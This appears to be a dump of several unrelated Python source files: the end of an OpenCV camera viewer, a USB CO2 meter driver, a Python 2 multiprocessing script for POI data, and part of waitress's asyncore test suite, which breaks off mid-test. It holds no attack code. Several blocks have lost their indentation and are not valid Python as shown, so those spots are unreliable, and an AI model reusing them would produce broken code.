    while True:
        frame = framesOut.get()
        cv2.imshow("Output", frame)
        # waitKey(1) lets the HighGUI event loop breathe between frames.
        cv2.waitKey(1)
def sigterm_handler(_signo, _stack_frame):
    """Handle SIGTERM: log the event and shut down cleanly with exit code 0."""
    print("sigterm_handler")
    # sys.exit(0) is equivalent to raising SystemExit(0).
    raise SystemExit(0)
# Install the SIGTERM handler so `kill` terminates the process cleanly.
signal.signal(signal.SIGTERM, sigterm_handler)
if __name__ == "__main__":
mainThread = threading.Thread(target=mainLoop, daemon=True)
mainThread.start()
displayImageThread = threading.Thread(target=displayImage, daemon=True)
displayImageThread.start()
queueFrames = threading.Thread(target=queueFrames, daemon=True)
queueFrames.start()
while True:
try:
#print( "%8s %12s %14s " % ( "main", framesIn.qsize(), framesOut.qsize() ) )
time.sleep(2)
except KeyboardInterrupt:
sys.exit(0)
#out = cv2.VideoWriter('/home/camera/output.mkv',cv2.VideoWriter_fourcc('H','E','V','C'), 30, (1024, 768))
# cap = cv2.VideoCapture("/z/camera/uploads/c3/2021/09/30/.C3_01_20210930201654-1280x960.mkv")
# cap = cv2.VideoCapture("/z/camera/C3/C3-2021-10-02-1601-2359.mkv")
# cap = cv2.VideoCapture("/z/camera/C3/C3-2021-10-02-0000-0800.mkv")
# VID_PATH,cv2.CAP_FFMPEG
#cap.set(3,640)
#cap.set(4,480)
#cap.set(10,70)
#resize = ResizeWithAspectRatio(img, width=1280)
#result, objectInfo = getObjects(img,0.45,0.2, objects=['cat',"bowl"])
#objectInfo(print)
# cv2.imshow("Output",img)
#out.write(img)
# end = time.time()
# seconds = end - start
# frames=frames+1
# if seconds > 5 :
# print ("Time taken : {0} seconds".format(seconds))
# fps = frames / seconds
# print("Estimated frames per second : {0}".format(fps))
# resettimer = 1
# frames = 0
#v = "/z/camera/C3/C3-2021-10-08-1601-2359.mkv"
#v = "/z/camera/uploads/c3/2021/09/30/.C3_01_20210930201654-1280x960.mkv"
#cap = cv2.VideoCapture("/z/camera/uploads/c3/2021/09/30/.C3_01_20210930201654-1280x960.mkv", cv2.CAP_FFMPEG)
#v = "/z/camera/C3-2021-Sept.mkv"
#v ="/z/camera/C3-2021-Sept-0000.mkv"
#v = "/z/camera/C3-2021-10-09.mkv"
#v = "/z/camera/C3/C3-2021-10-11-0000-0800.mkv"
#v ="/z/camera/C3/C3-2021-10-12-0000-0800.mkv"
#v ="/z/camera/C3/C3-2021-10-13-0000-0800.mkv"
#v = "/z/camera/C3/C3-2021-10-14-1601-2359.mkv"
#v = "/z/camera/C1-2021-10-Night.mkv"
#v = "/z/camera/C4/C4-2021-10-16-0000-0800.mkv"
#v = "/z/camera/2021-Oct-Night.mkv"
#v = "/z/camera/C3/C3-2021-10-16-0000-0800.mkv"
#v = "/z/camera/C3/C3-2021-10-15-0000-0800.mkv"
#v = "/z/camera/C3/C3-2021-10-14-0000-0800.mkv"
#v = "/z/camera/C3_01_20211016002548-0000-0800-1280x960.mkv"
#v = "/z/camera/uploads/c4/2021/10/15/.C4_01_20211015194005-1280x960.mkv"
|
CO2Meter.py | import sys
import fcntl
import threading
import weakref
# Operation codes reported by the meter (first byte of a decrypted report).
CO2METER_CO2 = 0x50
CO2METER_TEMP = 0x42
CO2METER_HUM = 0x44
# ioctl request number: HIDIOCSFEATURE for a 9-byte feature report.
HIDIOCSFEATURE_9 = 0xC0094806
def _co2_worker(weak_self):
while True:
self = weak_self()
if self is None:
break
self._read_data()
if not self._running:
break
del self
class CO2Meter:
    """Driver for Holtek-based USB CO2 monitors exposed as a hidraw node.

    A daemon thread (see _co2_worker) continuously reads 8-byte HID
    reports, decrypts them with `_key`, and caches decoded values in
    `self._values` keyed by the operation byte (CO2METER_* constants).
    """

    # Key written to the device via HIDIOCSFEATURE and used by _decrypt().
    _key = [0xc4, 0xc6, 0xc0, 0x92, 0x40, 0x23, 0xdc, 0x96]
    _device = ""
    _values = {}  # class-level fallback; instances get their own dict in __init__
    _file = ""
    _running = True
    _callback = None

    def __init__(self, device="/dev/hidraw0", callback=None):
        """Open *device* and start the background reader thread.

        :param device: path of the hidraw device node
        :param callback: optional ``callback(sensor=op, value=v)`` invoked
            for every valid decoded reading
        """
        self._device = device
        self._callback = callback
        # BUG FIX: use a per-instance dict; the original relied on the
        # class attribute, so every meter instance shared one cache.
        self._values = {}
        self._file = open(device, "a+b", 0)
        if sys.version_info >= (3,):
            set_report = [0] + self._key
            fcntl.ioctl(self._file, HIDIOCSFEATURE_9, bytearray(set_report))
        else:
            set_report_str = "\x00" + "".join(chr(e) for e in self._key)
            fcntl.ioctl(self._file, HIDIOCSFEATURE_9, set_report_str)
        # The worker holds only a weak reference so the meter can be GC'd.
        thread = threading.Thread(target=_co2_worker, args=(weakref.ref(self),))
        thread.daemon = True
        thread.start()

    def _read_data(self):
        """Read one 8-byte report, decrypt, validate and cache it.

        On any failure the worker is stopped by clearing `_running`;
        the public getters then raise IOError.
        """
        try:
            result = self._file.read(8)
            if sys.version_info >= (3,):
                data = list(result)
            else:
                data = list(ord(e) for e in result)
            decrypted = self._decrypt(data)
            # Valid frames end with 0x0d (byte 4); byte 3 is a one-byte
            # checksum over bytes 0..2.
            if decrypted[4] != 0x0d or (sum(decrypted[:3]) & 0xff) != decrypted[3]:
                print(self._hd(data), " => ", self._hd(decrypted), "Checksum error")
            else:
                operation = decrypted[0]
                val = decrypted[1] << 8 | decrypted[2]
                self._values[operation] = val
                if self._callback is not None:
                    if operation == CO2METER_CO2:
                        self._callback(sensor=operation, value=val)
                    elif operation == CO2METER_TEMP:
                        # Device reports 1/16 Kelvin. BUG FIX: use 273.15
                        # (as in get_temperature); the original used 273.1,
                        # biasing callback temperatures by +0.05 K.
                        self._callback(sensor=operation,
                                       value=round(val / 16.0 - 273.15, 1))
                    elif operation == CO2METER_HUM:
                        self._callback(sensor=operation, value=round(val / 100.0, 1))
        except Exception:
            # Was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt in the worker thread.
            self._running = False

    def _decrypt(self, data):
        """Decrypt one raw 8-byte report; returns a list of 8 ints (0-255)."""
        cstate = [0x48, 0x74, 0x65, 0x6D, 0x70, 0x39, 0x39, 0x65]  # "Htemp99e"
        shuffle = [2, 4, 0, 7, 1, 6, 5, 3]
        # Phase 1: undo the byte shuffle.
        phase1 = [0] * 8
        for i, j in enumerate(shuffle):
            phase1[j] = data[i]
        # Phase 2: XOR with the session key.
        phase2 = [0] * 8
        for i in range(8):
            phase2[i] = phase1[i] ^ self._key[i]
        # Phase 3: 3-bit rotate across adjacent bytes.
        phase3 = [0] * 8
        for i in range(8):
            phase3[i] = ((phase2[i] >> 3) | (phase2[(i - 1 + 8) % 8] << 5)) & 0xff
        # Subtract the nibble-swapped magic string, modulo 256.
        ctmp = [0] * 8
        for i in range(8):
            ctmp[i] = ((cstate[i] >> 4) | (cstate[i] << 4)) & 0xff
        out = [0] * 8
        for i in range(8):
            out[i] = (0x100 + phase3[i] - ctmp[i]) & 0xff
        return out

    @staticmethod
    def _hd(data):
        """Hex-dump a byte list as e.g. ``"50 0A FF"``."""
        return " ".join("%02X" % e for e in data)

    def get_co2(self):
        """Return ``{'co2': ppm}``, or ``{}`` before the first reading.

        :raises IOError: if the worker thread has stopped.
        """
        if not self._running:
            raise IOError("worker thread couldn't read data")
        result = {}
        if CO2METER_CO2 in self._values:
            result = {'co2': self._values[CO2METER_CO2]}
        return result

    def get_temperature(self):
        """Return ``{'temperature': degrees_C}``, or ``{}`` before the first reading.

        :raises IOError: if the worker thread has stopped.
        """
        if not self._running:
            raise IOError("worker thread couldn't read data")
        result = {}
        if CO2METER_TEMP in self._values:
            result = {'temperature': (self._values[CO2METER_TEMP] / 16.0 - 273.15)}
        return result

    def get_humidity(self):  # not implemented by all devices
        """Return ``{'humidity': percent_RH}``, or ``{}`` before the first reading.

        :raises IOError: if the worker thread has stopped.
        """
        if not self._running:
            raise IOError("worker thread couldn't read data")
        result = {}
        if CO2METER_HUM in self._values:
            result = {'humidity': (self._values[CO2METER_HUM] / 100.0)}
        return result

    def get_data(self):
        """Return all cached readings merged into a single dict."""
        result = {}
        result.update(self.get_co2())
        result.update(self.get_temperature())
        result.update(self.get_humidity())
        return result
|
uniPOIRelatedEdge.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import sys
import time
import logging
import getopt
from multiprocessing import Process
from util.UniPOIEdgeBasic import UniPOIEdgeBasic
from util.UniAdmPOIEdge import UniAdmPOIEdge
from util.dbopts import connectMongo
def processTask(type, x, city, directory, inum, poiMap, stdoutdir):
    """Build and run one edge-generation task (worker-process entry point).

    :param type: edge type — 'pp' (POI-POI) or 'ap'/'pa' (admin-POI)
    :param x: worker index
    :param city: city name
    :param directory: input records directory
    :param inum: total number of input files
    :param poiMap: mapping of grid nid -> pid
    :param stdoutdir: output subdirectory name
    :raises ValueError: if *type* is not one of 'pp', 'ap', 'pa'
    """
    PROP = {
        'INDEX': x,
        'CITY': city,
        'DIRECTORY': directory,
        'INUM': inum,
        'poiMap': poiMap,
        'stdoutdir': stdoutdir,
        'edgeType': type
    }
    if type == 'pp':
        task = UniPOIEdgeBasic(PROP)
    elif type in ('ap', 'pa'):
        task = UniAdmPOIEdge(PROP)
    else:
        # BUG FIX: an unknown type previously fell through to a NameError
        # on `task`; fail with an explicit, descriptive error instead.
        raise ValueError("unknown edge type: %r (expected 'pp', 'ap' or 'pa')" % (type,))
    task.run()
def usage():
    """Print command-line usage for this script."""
    print "python run.py -d /datasets -t pp -i 86"
def main(argv):
    """Main entry point.

    Options: -c/--city city name; -d/--directory input records path;
    -i/--inum total number of input files; -j/--jnum number of worker
    processes; -t/--type edge type ('pp', 'ap' or 'pa').
    """
    try:
        argsArray = ["help", "city=", 'directory=', 'inum=', 'jnum=', 'type=']
        opts, args = getopt.getopt(argv, "hc:d:i:j:t:", argsArray)
    except getopt.GetoptError as err:
        print str(err)
        usage()
        sys.exit(2)
    # Defaults used when an option is not supplied on the command line.
    city, directory, inum, jnum, stdoutdir = 'beijing', '/home/tao.jiang/datasets/JingJinJi/records', 86, 20, 'bj-newvis-sg'
    type = 'pp'
    for opt, arg in opts:
        if opt == '-h':
            usage()
            sys.exit()
        elif opt in ("-c", "--city"):
            city = arg
        elif opt in ("-d", "--directory"):
            directory = arg
        elif opt in ('-i', '--inum'):
            inum = int(arg)
        elif opt in ('-j', '--jnum'):
            jnum = int(arg)
        elif opt in ('-t', '--type'):
            type = arg
    STARTTIME = time.time()
    print "Start approach at %s" % STARTTIME
    # Load the grid nid -> pid mapping from the 'stvis' MongoDB database.
    poiMap = {}
    conn, db = connectMongo('stvis')
    plist = list(db['grids'].find({}, {
        'pid': 1,
        'nid': 1
    }))
    conn.close()
    print "POI List length: %d" % len(plist)
    for each in plist:
        poiMap[each['nid']] = each['pid']
    # plist = None
    # Run jnum worker processes in parallel. START
    jobs = []
    for x in xrange(0, jnum):
        jobs.append(Process(target=processTask, args=(type, x, city, directory, inum, poiMap, stdoutdir)))
        jobs[x].start()
    for job in jobs:
        job.join()
    # Output files are too large, so per-process results are not merged here.
    # mergeMultiProcessMatFiles(directory, stdoutdir, jnum)
    # Parallel run END
    print "END TIME: %s" % time.time()
if __name__ == '__main__':
    # Log everything (DEBUG and up) to a dedicated file, then run the CLI.
    logging.basicConfig(filename='logger-unipoirelatededge.log', level=logging.DEBUG)
    main(sys.argv[1:])
test_wasyncore.py | import _thread as thread
import contextlib
import errno
import functools
import gc
from io import BytesIO
import os
import re
import select
import socket
import struct
import sys
import threading
import time
import unittest
import warnings
from waitress import compat, wasyncore as asyncore
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
HOST = "localhost"
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
# Filename used for testing
if os.name == "java": # pragma: no cover
# Jython disallows @ in module names
TESTFN = "$test"
else:
TESTFN = "@test"
TESTFN = "{}_{}_tmp".format(TESTFN, os.getpid())
class DummyLogger:  # pragma: no cover
    """Test double that records (severity, message) pairs instead of logging."""

    def __init__(self):
        self.messages = []

    def log(self, severity, message):
        # Store the call verbatim so tests can assert on exact log output.
        entry = (severity, message)
        self.messages.append(entry)
class WarningsRecorder:  # pragma: no cover
    """Convenience wrapper for the warnings list returned on
    entry to the warnings.catch_warnings() context manager.
    """

    def __init__(self, warnings_list):
        # Keep a reference to the live list; catch_warnings appends to it.
        self._warnings = warnings_list
        self._last = 0

    @property
    def warnings(self):
        # Only the warnings recorded since the last reset().
        return self._warnings[self._last:]

    def reset(self):
        # Mark everything seen so far as consumed.
        self._last = len(self._warnings)
def _filterwarnings(filters, quiet=False):  # pragma: no cover
    """Catch the warnings, then check if all the expected
    warnings have been raised and re-raise unexpected warnings.
    If 'quiet' is True, only re-raise the unexpected warnings.

    NOTE: this is a generator; it is wrapped by check_warnings() below via
    contextlib.contextmanager, so the post-yield code runs on context exit.
    """
    # Clear the warning registry of the calling module
    # in order to re-raise the warnings.
    frame = sys._getframe(2)
    registry = frame.f_globals.get("__warningregistry__")
    if registry:
        registry.clear()
    with warnings.catch_warnings(record=True) as w:
        # Set filter "always" to record all warnings. Because
        # test_warnings swap the module, we need to look up in
        # the sys.modules dictionary.
        sys.modules["warnings"].simplefilter("always")
        yield WarningsRecorder(w)
    # Filter the recorded warnings
    reraise = list(w)
    missing = []
    for msg, cat in filters:
        seen = False
        # NOTE: the loop variable deliberately reuses `w`; iterate over a
        # copy because matches are removed from `reraise` as they are found.
        for w in reraise[:]:
            warning = w.message
            # Filter out the matching messages
            if re.match(msg, str(warning), re.I) and issubclass(warning.__class__, cat):
                seen = True
                reraise.remove(w)
        if not seen and not quiet:
            # This filter caught nothing
            missing.append((msg, cat.__name__))
    if reraise:
        raise AssertionError("unhandled warning %s" % reraise[0])
    if missing:
        raise AssertionError("filter (%r, %s) did not catch any warning" % missing[0])
@contextlib.contextmanager
def check_warnings(*filters, **kwargs):  # pragma: no cover
    """Context manager to silence warnings.

    Accept 2-tuples as positional arguments:
        ("message regexp", WarningCategory)

    Optional argument:
     - if 'quiet' is True, it does not fail if a filter catches nothing
        (default True without argument,
         default False if some filters are defined)

    Without argument, it defaults to:
        check_warnings(("", Warning), quiet=True)
    """
    quiet = kwargs.get("quiet")
    if not filters:
        filters = (("", Warning),)
        # Preserve backward compatibility: quiet defaults to True only in
        # the no-filters case.
        if quiet is None:
            quiet = True
    # Returns the generator from _filterwarnings; contextmanager drives it.
    return _filterwarnings(filters, quiet)
def gc_collect():  # pragma: no cover
    """Force as many objects as possible to be collected.

    In non-CPython implementations of Python, this is needed because timely
    deallocation is not guaranteed by the garbage collector. (Even in CPython
    this can be the case in case of reference cycles.) This means that __del__
    methods may be called later than expected and weakrefs may remain alive for
    longer than expected. This function tries its best to force all garbage
    objects to disappear.
    """
    gc.collect()
    if sys.platform.startswith("java"):
        # Give Jython's collector a moment to run finalizers.
        time.sleep(0.1)
    # Two more passes to break reference cycles discovered by the first.
    for _ in range(2):
        gc.collect()
def threading_setup(): # pragma: no cover
return (thread._count(), None)
def threading_cleanup(*original_values):  # pragma: no cover
    """Wait (up to ~1 s) for the thread count to return to *original_values*.

    Polls thread._count() in 10 ms steps, forcing garbage collection each
    time; warns on stderr once if extra threads are still alive.
    """
    global environment_altered
    _MAX_COUNT = 100
    for count in range(_MAX_COUNT):
        values = (thread._count(), None)
        if values == original_values:
            break
        if not count:
            # Display a warning at the first iteration
            environment_altered = True
            sys.stderr.write(
                "Warning -- threading_cleanup() failed to cleanup "
                "%s threads" % (values[0] - original_values[0])
            )
            sys.stderr.flush()
        # Drop the snapshot so gc can reclaim anything it referenced.
        values = None
        time.sleep(0.01)
        gc_collect()
def reap_threads(func):  # pragma: no cover
    """Use this function when threads are being used. This will
    ensure that the threads are cleaned up even when the test fails.
    """

    @functools.wraps(func)
    def decorator(*args):
        snapshot = threading_setup()
        try:
            return func(*args)
        finally:
            # Runs on success and on failure alike.
            threading_cleanup(*snapshot)

    return decorator
def join_thread(thread, timeout=30.0):  # pragma: no cover
    """Join a thread. Raise an AssertionError if the thread is still alive
    after timeout seconds.
    """
    thread.join(timeout)
    if thread.is_alive():
        raise AssertionError("failed to join the thread in %.1f seconds" % timeout)
def bind_port(sock, host=HOST):  # pragma: no cover
    """Bind the socket to a free port and return the port number. Relies on
    ephemeral ports in order to ensure we are using an unbound port. This is
    important as many tests may be running simultaneously, especially in a
    buildbot environment. This method raises an exception if the sock.family
    is AF_INET and sock.type is SOCK_STREAM, *and* the socket has SO_REUSEADDR
    or SO_REUSEPORT set on it. Tests should *never* set these socket options
    for TCP/IP sockets. The only case for setting these options is testing
    multicasting via multiple UDP sockets.

    Additionally, if the SO_EXCLUSIVEADDRUSE socket option is available (i.e.
    on Windows), it will be set on the socket. This will prevent anyone else
    from bind()'ing to our host/port for the duration of the test.
    """
    if sock.family == socket.AF_INET and sock.type == socket.SOCK_STREAM:
        if hasattr(socket, "SO_REUSEADDR"):
            if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR) == 1:
                raise RuntimeError(
                    "tests should never set the SO_REUSEADDR "
                    "socket option on TCP/IP sockets!"
                )
        if hasattr(socket, "SO_REUSEPORT"):
            try:
                if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 1:
                    raise RuntimeError(
                        "tests should never set the SO_REUSEPORT "
                        "socket option on TCP/IP sockets!"
                    )
            except OSError:
                # Python's socket module was compiled using modern headers
                # thus defining SO_REUSEPORT but this process is running
                # under an older kernel that does not support SO_REUSEPORT.
                pass
        if hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
    # Port 0 asks the OS for an ephemeral port; read back the one assigned.
    sock.bind((host, 0))
    port = sock.getsockname()[1]
    return port
@contextlib.contextmanager
def closewrapper(sock):  # pragma: no cover
    """Yield *sock* and unconditionally close it on context exit."""
    # contextlib.closing gives the same try/finally-close behavior.
    with contextlib.closing(sock):
        yield sock
class dummysocket:  # pragma: no cover
    """Minimal socket stand-in recording close() and setblocking() calls."""

    def __init__(self):
        self.closed = False

    def fileno(self):
        # Arbitrary fixed descriptor number.
        return 42

    def getpeername(self):
        return "peername"

    def setblocking(self, yesno):
        self.isblocking = yesno

    def close(self):
        self.closed = True
class dummychannel:  # pragma: no cover
    """Channel stand-in owning a dummysocket; close() closes the socket."""

    def __init__(self):
        self.socket = dummysocket()

    def close(self):
        # Delegate straight to the underlying fake socket.
        self.socket.close()
class exitingdummy:  # pragma: no cover
    """Handler double whose event callbacks all raise asyncore.ExitNow."""

    def __init__(self):
        pass

    def handle_read_event(self):
        raise asyncore.ExitNow()

    # All event entry points share the same ExitNow-raising implementation.
    handle_write_event = handle_read_event
    handle_close = handle_read_event
    handle_expt_event = handle_read_event
class crashingdummy:
    """Handler double whose event callbacks raise; handle_error records it."""

    def __init__(self):
        self.error_handled = False

    def _crash(self):
        # Every dispatched event blows up with a generic Exception.
        raise Exception()

    # All event entry points share the same crashing implementation.
    handle_read_event = _crash
    handle_write_event = _crash
    handle_close = _crash
    handle_expt_event = _crash

    def handle_error(self):
        # asyncore calls this when a handler raised; remember that it did.
        self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):  # pragma: no cover
    """Accept one connection on *serv* and copy its bytes into *buf*.

    Newlines are stripped; the loop stops at the first newline, after ~3
    seconds, or after 200 reads. *evt* is always set on exit so the test
    thread can synchronize.
    """
    try:
        serv.listen(0)
        conn, addr = serv.accept()
    except socket.timeout:
        pass
    else:
        n = 200
        start = time.time()
        while n > 0 and time.time() - start < 3.0:
            r, w, e = select.select([conn], [], [], 0.1)
            if r:
                n -= 1
                data = conn.recv(10)
                # keep everything except for the newline terminator
                buf.write(data.replace(b"\n", b""))
                if b"\n" in data:
                    break
            time.sleep(0.01)
        conn.close()
    finally:
        serv.close()
        evt.set()
def bind_unix_socket(sock, addr):  # pragma: no cover
    """Bind a unix socket, raising SkipTest if PermissionError is raised."""
    assert sock.family == socket.AF_UNIX
    try:
        sock.bind(addr)
    except PermissionError:
        # No permission to create the socket file: skip rather than fail.
        sock.close()
        raise unittest.SkipTest("cannot bind AF_UNIX sockets")
def bind_af_aware(sock, addr):
    """Helper function to bind a socket according to its family."""
    if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
        # Make sure the path doesn't exist.
        unlink(addr)
        bind_unix_socket(sock, addr)
    else:
        sock.bind(addr)
# Windows keeps deleted files visible while handles are pending close, so
# deletion there needs a retry loop; elsewhere os.unlink is enough.
if sys.platform.startswith("win"):  # pragma: no cover

    def _waitfor(func, pathname, waitall=False):
        # Perform the operation
        func(pathname)
        # Now setup the wait loop
        if waitall:
            dirname = pathname
        else:
            dirname, name = os.path.split(pathname)
            dirname = dirname or "."
        # Check for `pathname` to be removed from the filesystem.
        # The exponential backoff of the timeout amounts to a total
        # of ~1 second after which the deletion is probably an error
        # anyway.
        # Testing on an i7@4.3GHz shows that usually only 1 iteration is
        # required when contention occurs.
        timeout = 0.001
        while timeout < 1.0:
            # Note we are only testing for the existence of the file(s) in
            # the contents of the directory regardless of any security or
            # access rights.  If we have made it this far, we have sufficient
            # permissions to do that much using Python's equivalent of the
            # Windows API FindFirstFile.
            # Other Windows APIs can fail or give incorrect results when
            # dealing with files that are pending deletion.
            L = os.listdir(dirname)
            if not (L if waitall else name in L):
                return
            # Increase the timeout and try again
            time.sleep(timeout)
            timeout *= 2
        warnings.warn(
            "tests may fail, delete still pending for " + pathname,
            RuntimeWarning,
            stacklevel=4,
        )

    def _unlink(filename):
        _waitfor(os.unlink, filename)

else:
    _unlink = os.unlink
def unlink(filename):
    """Remove *filename*, silently ignoring the error if it is missing."""
    # Best-effort delete: a nonexistent file is fine.
    with contextlib.suppress(OSError):
        _unlink(filename)
def _is_ipv6_enabled():  # pragma: no cover
    """Check whether IPv6 is enabled on this host."""
    if compat.HAS_IPV6:
        sock = None
        try:
            # Binding to ::1 proves the loopback IPv6 stack actually works,
            # not just that the constants exist.
            sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
            sock.bind(("::1", 0))
            return True
        except OSError:
            pass
        finally:
            if sock:
                sock.close()
    return False


# Evaluated once at import time; used to gate the IPv6 test classes below.
IPV6_ENABLED = _is_ipv6_enabled()
class HelperFunctionTests(unittest.TestCase):
    """Tests for the module-level helpers read/write/readwrite/close_all
    and compact_traceback in waitress.wasyncore."""

    def test_readwriteexc(self):
        # Check exception handling behavior of read, write and _exception

        # check that ExitNow exceptions in the object handler method
        # bubbles all the way up through asyncore read/write/_exception calls
        tr1 = exitingdummy()
        self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
        self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
        self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)

        # check that an exception other than ExitNow in the object handler
        # method causes the handle_error method to get called
        tr2 = crashingdummy()
        asyncore.read(tr2)
        self.assertEqual(tr2.error_handled, True)

        tr2 = crashingdummy()
        asyncore.write(tr2)
        self.assertEqual(tr2.error_handled, True)

        tr2 = crashingdummy()
        asyncore._exception(tr2)
        self.assertEqual(tr2.error_handled, True)

    # asyncore.readwrite uses constants in the select module that
    # are not present in Windows systems (see this thread:
    # http://mail.python.org/pipermail/python-list/2001-October/109973.html)
    # These constants should be present as long as poll is available
    @unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
    def test_readwrite(self):
        # Check that correct methods are called by readwrite()
        attributes = ("read", "expt", "write", "closed", "error_handled")
        expected = (
            (select.POLLIN, "read"),
            (select.POLLPRI, "expt"),
            (select.POLLOUT, "write"),
            (select.POLLERR, "closed"),
            (select.POLLHUP, "closed"),
            (select.POLLNVAL, "closed"),
        )

        # Records which handler readwrite() dispatched to for each poll flag.
        class testobj:
            def __init__(self):
                self.read = False
                self.write = False
                self.closed = False
                self.expt = False
                self.error_handled = False

            def handle_read_event(self):
                self.read = True

            def handle_write_event(self):
                self.write = True

            def handle_close(self):
                self.closed = True

            def handle_expt_event(self):
                self.expt = True

            # def handle_error(self):
            #     self.error_handled = True

        for flag, expectedattr in expected:
            tobj = testobj()
            self.assertEqual(getattr(tobj, expectedattr), False)
            asyncore.readwrite(tobj, flag)

            # Only the attribute modified by the routine we expect to be
            # called should be True.
            for attr in attributes:
                self.assertEqual(getattr(tobj, attr), attr == expectedattr)

            # check that ExitNow exceptions in the object handler method
            # bubbles all the way up through asyncore readwrite call
            tr1 = exitingdummy()
            self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)

            # check that an exception other than ExitNow in the object handler
            # method causes the handle_error method to get called
            tr2 = crashingdummy()
            self.assertEqual(tr2.error_handled, False)
            asyncore.readwrite(tr2, flag)
            self.assertEqual(tr2.error_handled, True)

    def test_closeall(self):
        self.closeall_check(False)

    def test_closeall_default(self):
        self.closeall_check(True)

    def closeall_check(self, usedefault):
        # Check that close_all() closes everything in a given map
        l = []
        testmap = {}
        for i in range(10):
            c = dummychannel()
            l.append(c)
            self.assertEqual(c.socket.closed, False)
            testmap[i] = c

        if usedefault:
            # Temporarily swap the module-global socket_map in and out.
            socketmap = asyncore.socket_map
            try:
                asyncore.socket_map = testmap
                asyncore.close_all()
            finally:
                testmap, asyncore.socket_map = asyncore.socket_map, socketmap
        else:
            asyncore.close_all(testmap)

        self.assertEqual(len(testmap), 0)
        for c in l:
            self.assertEqual(c.socket.closed, True)

    def test_compact_traceback(self):
        try:
            raise Exception("I don't like spam!")
        except:
            # compact_traceback() needs an active exception context.
            real_t, real_v, real_tb = sys.exc_info()
            r = asyncore.compact_traceback()

        (f, function, line), t, v, info = r
        self.assertEqual(os.path.split(f)[-1], "test_wasyncore.py")
        self.assertEqual(function, "test_compact_traceback")
        self.assertEqual(t, real_t)
        self.assertEqual(v, real_v)
        self.assertEqual(info, "[%s|%s|%s]" % (f, function, line))
class DispatcherTests(unittest.TestCase):
    """Tests for basic wasyncore.dispatcher behavior (repr, logging,
    unhandled-event warnings, _strerror)."""

    def setUp(self):
        pass

    def tearDown(self):
        asyncore.close_all()

    def test_basic(self):
        d = asyncore.dispatcher()
        self.assertEqual(d.readable(), True)
        self.assertEqual(d.writable(), True)

    def test_repr(self):
        d = asyncore.dispatcher()
        self.assertEqual(repr(d), "<waitress.wasyncore.dispatcher at %#x>" % id(d))

    def test_log_info(self):
        import logging

        inst = asyncore.dispatcher(map={})
        logger = DummyLogger()
        inst.logger = logger
        inst.log_info("message", "warning")
        self.assertEqual(logger.messages, [(logging.WARN, "message")])

    def test_log(self):
        import logging

        inst = asyncore.dispatcher()
        logger = DummyLogger()
        inst.logger = logger
        inst.log("message")
        self.assertEqual(logger.messages, [(logging.DEBUG, "message")])

    def test_unhandled(self):
        import logging

        inst = asyncore.dispatcher()
        logger = DummyLogger()
        inst.logger = logger
        # Each default handler should log a WARN about the unhandled event.
        inst.handle_expt()
        inst.handle_read()
        inst.handle_write()
        inst.handle_connect()
        expected = [
            (logging.WARN, "unhandled incoming priority event"),
            (logging.WARN, "unhandled read event"),
            (logging.WARN, "unhandled write event"),
            (logging.WARN, "unhandled connect event"),
        ]
        self.assertEqual(logger.messages, expected)

    def test_strerror(self):
        # refers to bug #8573
        err = asyncore._strerror(errno.EPERM)
        if hasattr(os, "strerror"):
            self.assertEqual(err, os.strerror(errno.EPERM))
        # Unknown errno should still produce a non-empty message.
        err = asyncore._strerror(-1)
        self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):  # pragma: no cover
    """dispatcher_with_send variant that never reads and ignores connect."""

    def readable(self):
        # Never interested in read events.
        return False

    def handle_connect(self):
        pass
class DispatcherWithSendTests(unittest.TestCase):
    """End-to-end test of dispatcher_with_send against capture_server."""

    def setUp(self):
        pass

    def tearDown(self):
        asyncore.close_all()

    @reap_threads
    def test_send(self):
        evt = threading.Event()
        sock = socket.socket()
        sock.settimeout(3)
        port = bind_port(sock)

        cap = BytesIO()
        args = (evt, cap, sock)
        t = threading.Thread(target=capture_server, args=args)
        t.start()
        try:
            # wait a little longer for the server to initialize (it sometimes
            # refuses connections on slow machines without this wait)
            time.sleep(0.2)

            data = b"Suppose there isn't a 16-ton weight?"
            d = dispatcherwithsend_noread()
            d.create_socket()
            d.connect((HOST, port))

            # give time for socket to connect
            time.sleep(0.1)

            d.send(data)
            d.send(data)
            d.send(b"\n")

            # Drain the output buffer, bounded so a stuck socket can't hang us.
            n = 1000
            while d.out_buffer and n > 0:  # pragma: no cover
                asyncore.poll()
                n -= 1

            evt.wait()

            # The server strips the trailing newline, so exactly data * 2.
            self.assertEqual(cap.getvalue(), data * 2)
        finally:
            join_thread(t, timeout=TIMEOUT)
@unittest.skipUnless(
    hasattr(asyncore, "file_wrapper"), "asyncore.file_wrapper required"
)
class FileWrapperTest(unittest.TestCase):
    """Tests for file_wrapper / file_dispatcher over a temp file (TESTFN)."""

    def setUp(self):
        self.d = b"It's not dead, it's sleeping!"
        with open(TESTFN, "wb") as file:
            file.write(self.d)

    def tearDown(self):
        unlink(TESTFN)

    def test_recv(self):
        fd = os.open(TESTFN, os.O_RDONLY)
        w = asyncore.file_wrapper(fd)
        # file_wrapper dup()s the fd, so closing ours must not affect it.
        os.close(fd)

        self.assertNotEqual(w.fd, fd)
        self.assertNotEqual(w.fileno(), fd)
        self.assertEqual(w.recv(13), b"It's not dead")
        self.assertEqual(w.read(6), b", it's")
        # Returns False; this next assert fails if the close fails.
        w.close()
        self.assertRaises(OSError, w.read, 1)

    def test_send(self):
        d1 = b"Come again?"
        d2 = b"I want to buy some cheese."
        fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
        w = asyncore.file_wrapper(fd)
